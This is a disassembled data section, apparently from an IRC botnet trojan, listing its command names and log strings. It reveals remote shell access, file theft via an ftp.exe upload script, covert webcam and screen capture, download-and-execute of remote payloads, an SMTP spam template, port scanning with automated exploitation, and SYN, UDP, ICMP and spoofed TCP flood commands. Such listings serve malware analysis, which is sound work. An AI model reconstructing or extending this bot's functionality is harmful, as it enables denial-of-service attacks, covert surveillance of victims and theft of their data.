dword_430780 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40EE72+4AD2�o
dd 0BBBB0220h, 44202002h, 74656C65h, 27206465h, 2E277325h
dd 0
dword_4307AC dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4A4D�o
dd 2BBBB02h
aSendFileSUserS db ' Send File: %s, User: %s.',0
align 10h
dword_4307E0 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40EE72+49D2�o
dd 0BBBB0220h, 4C202002h, 3A747369h, 732520h
unk_430804 db 2 ; DATA XREF: sub_40EE72+49B4�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToSta_15 db 'Failed to start connection thread, error: <%d>.',0
dword_430850 dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40EE72+4945�o
dd 0BB022029h, 202002BBh, 3A4C5255h, 2E732520h, 0
dword_430878 dd 7A026E02h, 201F6D1Fh, 72696D28h, 1F702E63h, 29671F6Ch
; DATA XREF: sub_40EE72:loc_413745�o
dd 0BBBB0220h, 43202002h, 616D6D6Fh, 7320646Eh, 2E746E65h
dd 0
unk_4308A4 db 2 ; DATA XREF: sub_40EE72+48C9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Dh, 69h, 72h
db 63h ; c
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientNotOpen_ db ' Client not open.',0
dword_4308D0 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4898�o
dd 2BBBB02h, 6F432020h, 6E616D6Dh, 203A7364h, 7325h
dword_4308F8 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+488D�o
dd 2BBBB02h
aErrorSendingTo db ' Error sending to remote shell.',0
align 4
dword_430934 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+484D�o
dd 2BBBB02h
aReadFileFailed db ' Read file failed: %s',0
align 4
dword_430964 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4839�o
dd 2BBBB02h
aReadFileComple db ' Read file complete: %s',0
align 4
dword_430998 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413639�o
dd 2029671Fh, 2BBBB02h
aInvalidParam_0 db ' Invalid parameters for amateur video capture.',0
dword_4309E4 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_41362F�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCapt db ' Error while capturing amateur video from webcam.',0
align 4
dword_430A34 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+47B3�o
dd 2029671Fh, 2BBBB02h
aAmateurVideoSa db ' Amateur video saved to: %s.',0
align 10h
aVideo db 'video',0 ; DATA XREF: sub_40EE72:loc_4135A0�o
align 4
dword_430A78 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_41358D�o
dd 2029671Fh, 2BBBB02h
aInvalidParam_1 db ' Invalid parameters for webcam capture.',0
align 10h
dword_430AC0 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413586�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCa_0 db ' Error while capturing from webcam.',0
align 4
dword_430B04 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+4704�o
dd 2029671Fh, 2BBBB02h
aWebcamCaptureS db ' Webcam capture saved to: %s.',0
align 10h
aFrame db 'frame',0 ; DATA XREF: sub_40EE72:loc_4134FA�o
align 4
dword_430B48 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+467B�o
dd 2029671Fh, 2BBBB02h
aDriverListComp db ' Driver list complete.',0
dword_430B7C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+4645�o
dd 2029671Fh, 2BBBB02h
aDriverDSS_ db ' Driver #%d - %s - %s.',0
aDrivers db 'drivers',0 ; DATA XREF: sub_40EE72:loc_413463�o
dword_430BB8 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413450�o
dd 2029671Fh, 2BBBB02h
aNoFilenameSpec db ' No filename specified for screen capture.',0
dword_430C00 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413449�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCa_1 db ' Error while capturing screen.',0
dword_430C3C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+45C7�o
dd 2029671Fh, 2BBBB02h
aScreenCaptureS db ' Screen capture saved to: %s.',0
align 4
aScreen db 'screen',0 ; DATA XREF: sub_40EE72:loc_413400�o
align 10h
dword_430C80 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4576�o
dd 2BBBB02h, 65472020h, 736F6874h, 25203A74h, 2E73h
dword_430CA8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4532�o
dd 2BBBB02h
aUnableToExtrac db ' Unable to extract Gethost command.',0
align 4
dword_430CE8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4516�o
dd 2BBBB02h
aGethostSComman db ' Gethost: %s, Command: %s',0
align 4
dword_430D1C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4496�o
dd 2BBBB02h
aAliasAddedS_ db ' Alias added: %s.',0
align 4
dword_430D48 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+445F�o
dd 2BBBB02h
aPrivmsgSS_ db ' Privmsg: %s: %s.',0
align 4
dword_430D74 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4411�o
dd 2BBBB02h
aActionSS_ db ' Action: %s: %s.',0
align 10h
dword_430DA0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+43A0�o
dd 2BBBB02h, 79432020h, 2E656C63h, 0
dword_430DC4 dd 54524150h, 0D732520h, 0Ah ; DATA XREF: sub_40EE72+4366�o
; sub_40EE72+4E78�o
dword_430DD0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+433F�o
dd 2BBBB02h
aModeChangeS db ' Mode change: %s',0
align 4
aModeS db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+432E�o
align 4
dword_430E08 dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40EE72+4305�o
dd 2202967h, 2002BBBBh, 77615220h, 73252820h, 25203A29h
dd 73h
dword_430E34 dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40EE72+4297�o
dd 2202967h, 2002BBBBh, 646F4D20h, 25282065h, 203A2973h
dd 7325h
dword_430E60 dd 45444F4Dh, 732520h ; DATA XREF: sub_40EE72+423F�o
dword_430E68 dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40EE72+4212�o
dd 2202967h, 2002BBBBh, 63694E20h, 2528206Bh, 203A2973h
dd 7325h
dword_430E94 dd 4B43494Eh, 732520h ; DATA XREF: sub_40EE72+41B9�o
; sub_40EE72+4CAD�o
dword_430E9C dd 4E494F4Ah, 20732520h, 7325h ; DATA XREF: sub_40EE72+419A�o
dword_430EA8 dd 54524150h, 732520h ; DATA XREF: sub_40EE72+4130�o
dword_430EB0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_412F8F�o
dd 2BBBB02h
aRepeatNotAllow db ' Repeat not allowed in command line: %s',0
align 4
dword_430EF4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+40E6�o
dd 2BBBB02h, 65522020h, 74616570h, 7325203Ah, 0
aRepeat db 'repeat',0 ; DATA XREF: sub_40EE72+4092�o
align 4
dword_430F24 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_412EBC�o
dd 2BBBB02h, 65442020h, 2E79616Ch, 0
dword_430F48 dd 25207325h, 73252073h, 73253A20h, 0 ; DATA XREF: sub_40EE72+400A�o
; sub_40EE72+40BD�o ...
unk_430F58 db 2 ; DATA XREF: sub_40EE72:loc_412E29�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aBotIdMustBeDif db ' Bot ID must be different than current running process.',0
unk_430FAC db 2 ; DATA XREF: sub_40EE72+3FAD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToStartD db ' Failed to start download thread, error: <%d>.',0
align 4
unk_430FF8 db 2 ; DATA XREF: sub_40EE72+3F3E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aDownloadingUpd db ' Downloading update from: %s.',0
align 4
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40EE72+3E95�o
align 10h
dword_431040 dd 7A026E02h, 201F6D1Fh, 65786528h, 1F702E63h, 29671F6Ch
; DATA XREF: sub_40EE72+3E33�o
dd 0BBBB0220h, 43202002h, 616D6D6Fh, 3A73646Eh, 732520h
unk_431068 db 2 ; DATA XREF: sub_40EE72+3E28�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 65h, 78h, 65h
db 63h ; c
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTExecute db ' Couldn',27h,'t execute file.',0
align 4
unk_43109C db 2 ; DATA XREF: sub_40EE72+3DA0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_16 db ' Failed to start search thread, error: <%d>.',0
align 4
unk_4310E8 db 2 ; DATA XREF: sub_40EE72+3D26�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingFor_0 db ' Searching for file: %s in: %s.',0
align 4
dword_431128 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40EE72:loc_412AF9�o
; sub_40EE72:loc_413962�o
dd 0BBBB0220h, 2002h
unk_431144 db 2 ; DATA XREF: sub_40EE72+3C6F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aRenameSToS_ db ' Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
unk_431178 db 2 ; DATA XREF: sub_40EE72:loc_412ABF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aInvalidFloodTi db ' Invalid flood time must be greater than 0.',0
align 10h
unk_4311C0 db 2 ; DATA XREF: sub_40EE72+3C43�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartF db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_431208 db 2 ; DATA XREF: sub_40EE72+3BCF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSForSS db ' Flooding: (%s) for %s seconds.',0
align 4
unk_431244 db 2 ; DATA XREF: sub_40EE72+3B4C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Ch, 6Fh
db 6Eh ; n
db 65h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToSta_17 db ' Failed to start clone thread, error: <%d>.',0
unk_43128C db 2 ; DATA XREF: sub_40EE72+3ADD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Ch, 6Fh
db 6Eh ; n
db 65h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aCreatedOnSDInC db ' Created on %s:%d, in channel %s.',0
align 4
unk_4312CC db 2 ; DATA XREF: sub_40EE72+3A55�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_18 db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_431314 db 2 ; DATA XREF: sub_40EE72+39E6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSSForS db ' Flooding: (%s:%s) for %s seconds.',0
align 4
dword_431354 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+3948�o
dd 2BBBB02h
aFailedToSta_19 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_43139C dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+38D7�o
dd 2BBBB02h
aFloodingSSFo_0 db ' Flooding: (%s:%s) for %s seconds.',0
unk_4313D8 db 2 ; DATA XREF: sub_40EE72+385E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartT db ' Failed to start transfer thread, error: <%d>.',0
align 4
unk_431428 db 2 ; DATA XREF: sub_40EE72+37EF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloadingUrl db ' Downloading URL: %s to: %s.',0
align 4
unk_431464 db 2 ; DATA XREF: sub_40EE72+371D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartR db ' Failed to start redirection thread, error: <%d>.',0
align 4
unk_4314B8 db 2 ; DATA XREF: sub_40EE72+36AE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTcpRedirectCre db ' TCP redirect created from: %s:%d to: %s:%d.',0
unk_431504 db 2 ; DATA XREF: sub_40EE72+3620�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_20 db ' Failed to start scan thread, error: <%d>.',0
align 10h
unk_431550 db 2 ; DATA XREF: sub_40EE72+35B1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aPortScanStarte db ' Port scan started: %s:%d with delay: %d(ms).',0
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_40EE72+352D�o
align 4
aSSS_1 db '[%s] * %s %s',0 ; DATA XREF: sub_40EE72+3430�o
align 4
dword_4315BC dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_40EE72+33A2�o
; sub_40EE72+43EF�o
unk_4315C8 db 2 ; DATA XREF: sub_40EE72+3340�o
; sub_40EE72+5179�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_21 db ' Failed to start scan thread, error: <%d>.',0
align 10h
unk_431610 db 2 ; DATA XREF: sub_40EE72+32D1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSExploitationS db ' %s Exploitation started on %s:%d waiting %d seconds for %d minu'
db 'tes using %d threads.',0
aSequential db 'Sequential',0 ; DATA XREF: sub_40EE72+32A6�o
; sub_40EE72+50DD�o
align 4
aRandom_0 db 'Random',0 ; DATA XREF: sub_40EE72+329F�o
; sub_40EE72+50D6�o
align 4
unk_431694 db 2 ; DATA XREF: sub_40EE72+3161�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_22 db ' Failed to start scan, no IP specified.',0
align 4
unk_4316D8 db 2 ; DATA XREF: sub_40EE72+301A�o
; sub_40EE72+4F21�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aAlreadyDScanni db ' Already %d scanning threads. Too many specified.',0
dword_431724 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2FE9�o
dd 2BBBB02h
aFailedToSta_23 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_43176C dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2F7A�o
dd 2BBBB02h
aSendingDPacket db ' Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_40EE72+2EA2�o
align 4
unk_4317DC db 2 ; DATA XREF: sub_40EE72+2E8D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_24 db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_431824 db 2 ; DATA XREF: sub_40EE72+2E22�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSendingDPingsT db ' Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 4
dword_43187C dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_411BF4�o
dd 2BBBB02h
aInvalidFlood_0 db ' Invalid flood time must be greater than 0.',0
align 4
dword_4318C4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2D78�o
dd 2BBBB02h
aFailedToSta_25 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_43190C dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2CFE�o
dd 2BBBB02h
aSSFloodingSSFo db ' %s %s flooding: (%s:%s) for %s seconds.',0
align 10h
aNormal db 'Normal',0 ; DATA XREF: sub_40EE72+2CEE�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_40EE72+2CE7�o
dword_431960 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2C4C�o
dd 2BBBB02h
aInvalidFloodTy db ' Invalid flood type specified.',0
dword_431998 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_4119D3�o
dd 2BBBB02h
aUploadingFileS db ' Uploading file: %s to: %s failed.',0
dword_4319D4 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2B5A�o
dd 2BBBB02h
aUploadingFil_0 db ' Uploading file: %s to: %s',0
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_40EE72+2B43�o
aSS_4 db '-s:%s',0 ; DATA XREF: sub_40EE72+2B2C�o
align 4
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_40EE72+2B09�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_40EE72+2AD4�o
align 4
dword_431A4C dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2A8A�o
dd 2BBBB02h
aFileNotFoundS_ db ' File not found: %s.',0
align 4
aFtp_upload db 'ftp.upload',0 ; DATA XREF: sub_40EE72+2A67�o
align 4
aUtil_hcon db 'util.hcon',0 ; DATA XREF: sub_40EE72+2A44�o
align 4
aUtil_httpcon db 'util.httpcon',0 ; DATA XREF: sub_40EE72+2A2D�o
align 4
unk_431AA4 db 3 ; DATA XREF: sub_40EE72+2A11�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 65h
db 6Dh ; m
db 61h, 69h, 6Ch
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5MessageSentTo db '5 Message sent to %s.',0
align 4
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_40EE72+299D�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a__1: ; DATA XREF: sub_40EE72+2901�o
unicode 0, <_>,0
aUtil_email db 'util.email',0 ; DATA XREF: sub_40EE72+28B2�o
align 10h
aDdos_tcpf db 'ddos.tcpf',0 ; DATA XREF: sub_40EE72+289B�o
align 4
aDdos_tcpflood db 'ddos.tcpflood',0 ; DATA XREF: sub_40EE72+2884�o
align 4
aP: ; DATA XREF: sub_40EE72+286D�o
unicode 0, <p>,0
aDdos_pingf db 'ddos.pingf',0 ; DATA XREF: sub_40EE72+2856�o
align 4
aDdos_pingflood db 'ddos.pingflood',0 ; DATA XREF: sub_40EE72+283F�o
align 4
aU_0: ; DATA XREF: sub_40EE72+2828�o
unicode 0, <u>,0
aDdos_udpf db 'ddos.udpf',0 ; DATA XREF: sub_40EE72+2811�o
align 4
aDdos_udpflood db 'ddos.udpflood',0 ; DATA XREF: sub_40EE72+27FA�o
align 4
aAdv db 'adv',0 ; DATA XREF: sub_40EE72+27E3�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_40EE72+27CC�o
aClone_ac db 'clone.ac',0 ; DATA XREF: sub_40EE72+27A3�o
align 4
aClone_action db 'clone.action',0 ; DATA XREF: sub_40EE72+278C�o
align 4
aClone_pm db 'clone.pm',0 ; DATA XREF: sub_40EE72+2775�o
align 10h
aClone_privmsg db 'clone.privmsg',0 ; DATA XREF: sub_40EE72+275E�o
align 10h
aRoot_ps db 'root.ps',0 ; DATA XREF: sub_40EE72+2747�o
aRoot_portscan db 'root.portscan',0 ; DATA XREF: sub_40EE72+2730�o
align 4
aDaemon_rd db 'daemon.rd',0 ; DATA XREF: sub_40EE72+2719�o
align 4
aDaemon_redirec db 'daemon.redirect',0 ; DATA XREF: sub_40EE72+2702�o
aDownload_wg db 'download.wg',0 ; DATA XREF: sub_40EE72+26EB�o
aDownload_wget db 'download.wget',0 ; DATA XREF: sub_40EE72+26D4�o
align 10h
aDdos_synf db 'ddos.synf',0 ; DATA XREF: sub_40EE72+26BD�o
align 4
aDdos_synflood db 'ddos.synflood',0 ; DATA XREF: sub_40EE72+26A6�o
align 4
aClone_start db 'clone.start',0 ; DATA XREF: sub_40EE72+264A�o
aClone_make db 'clone.make',0 ; DATA XREF: sub_40EE72+2633�o
align 4
aDdos_ic db 'ddos.ic',0 ; DATA XREF: sub_40EE72+260A�o
aDdos_icmp db 'ddos.icmp',0 ; DATA XREF: sub_40EE72+25F3�o
align 4
aCom_mv db 'com.mv',0 ; DATA XREF: sub_40EE72+25DC�o
align 10h
aCom_rename db 'com.rename',0 ; DATA XREF: sub_40EE72+25C5�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_40EE72+25AE�o
align 10h
aFindfile db 'findfile',0 ; DATA XREF: sub_40EE72+2597�o
align 4
aCom_e db 'com.e',0 ; DATA XREF: sub_40EE72+2580�o
align 4
aCom_execute db 'com.execute',0 ; DATA XREF: sub_40EE72+2569�o
